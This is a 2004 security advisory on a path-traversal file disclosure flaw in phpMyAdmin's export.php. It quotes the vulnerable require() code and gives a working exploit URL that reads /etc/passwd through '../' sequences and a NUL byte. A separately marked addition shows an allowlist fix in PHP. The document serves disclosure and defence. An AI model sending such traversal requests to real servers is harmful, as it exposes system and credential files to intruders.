phpMyAdmin255pl1.txt

2004-02-03T00:00:00
ID PACKETSTORM:32613
Type packetstorm
Reporter Cedric Cochin
Modified 2004-02-03T00:00:00

Description

                                        
Arbitrary File Disclosure Vulnerability in phpMyAdmin 2.5.5-pl1 and prior  
  
################################################################################  
Summary :  
  
phpMyAdmin is a tool written in PHP intended to handle the administration of  
MySQL over the WWW. There is a vulnerability in the current stable version of  
phpMyAdmin that allows an attacker to retrieve arbitrary files from the  
webserver with the privileges of the webserver.
  
################################################################################  
Details :  
  
The export PHP script can be exploited to disclose arbitrary files through an
include() PHP call.
  
Vulnerable Systems:  
* phpMyAdmin 2.5.5-pl1 and prior  
  
Release Date :  
February 2, 2004  
  
Severity :  
HIGH  
  
################################################################################  
Examples :  
  
-------------------------------------------  
  
I - Arbitrary File Disclosure  
(HIGH Risk)  
  
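File impacted : export.php (lines 14-24)

// What type of export are we doing?
// $what is taken from the request (export.php?what=...) without validation.
if ($what == 'excel') {
    $type = 'csv';
} else {
    $type = $what;
}

/**
 * Defines the url to return to in case of error in a sql statement
 */
// $type is concatenated into the path unchecked, so '../' sequences and a
// trailing %00 (NUL) let the request choose the file that is loaded.
require('./libraries/export/' . $type . '.php');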
  
Exploit example:  
  
-- HTTP Request --

http://[target]/[phpMyAdmin_directory]/export.php?what=../../../../../../etc/passwd%00

-- HTTP Request --

The vulnerability is exploitable even if PHP register_globals is set to off.
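
Added example (not part of the original advisory and not the phpMyAdmin
project's fix): one way to keep a request-supplied export type out of the
require() path is to accept it only when it exactly matches an installed plugin
name. The helper name resolve_export_plugin, the temporary directory and the
sql.php stub are assumptions constructed for the demo.

```php
<?php
// Added example, not phpMyAdmin code. Directory layout and the 'sql' plugin
// name are constructed for the demo.

/**
 * Hypothetical helper: map the request's "what" value to an export plugin
 * path, or return null. The value only becomes part of a path after it has
 * matched the name of a plugin file that exists in $pluginDir.
 */
function resolve_export_plugin($what, $pluginDir)
{
    if (!is_string($what)) {
        return null;                    // e.g. what[]=x arrives as an array
    }
    // Same mapping as the advisory's excerpt: 'excel' is served by csv.php.
    $type = ($what === 'excel') ? 'csv' : $what;

    // Short lowercase token only: no '/', no '.', no NUL byte.
    if (!preg_match('/\A[a-z0-9_]{1,32}\z/', $type)) {
        return null;
    }
    // Allowlist built from the plugin files actually installed.
    $known = array_map(
        function ($p) { return basename($p, '.php'); },
        glob($pluginDir . '/*.php') ?: array()
    );
    if (!in_array($type, $known, true)) {
        return null;
    }
    return $pluginDir . '/' . $type . '.php';
}

// Constructed demo: a temporary plugin directory with two stub plugins.
$dir = sys_get_temp_dir() . '/export_demo_' . getmypid();
@mkdir($dir);
file_put_contents($dir . '/csv.php', "<?php // stub\n");
file_put_contents($dir . '/sql.php', "<?php // stub\n");

$inputs = array('csv', 'excel', 'sql', 'pdf', 'CSV', '../csv',
                "../../../../../../etc/passwd\0");
foreach ($inputs as $in) {
    $path = resolve_export_plugin($in, $dir);
    printf("%-36s => %s\n", addcslashes($in, "\0"),
           $path === null ? 'rejected' : basename($path));
}
array_map('unlink', glob($dir . '/*.php'));
rmdir($dir);
```

Only csv, excel and sql resolve to a file; every other input, including the
traversal string from the request above, is rejected before any path is built.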
  
################################################################################  
Vendor Status :  
  
The information has been provided to the phpMyAdmin Project Managers.  
A new release candidate 2.5.6-rc1 with fixes for this vulnerability is available.  
--> http://www.phpmyadmin.net/home_page/
--> http://www.phpmyadmin.net/home_page/relnotes.php?rel=0
  
################################################################################  
Credit :  
  
Cedric Cochin, Security Engineer, netVigilance, Inc. (www.netvigilance.com)  
< cco@netvigilance.com >  
  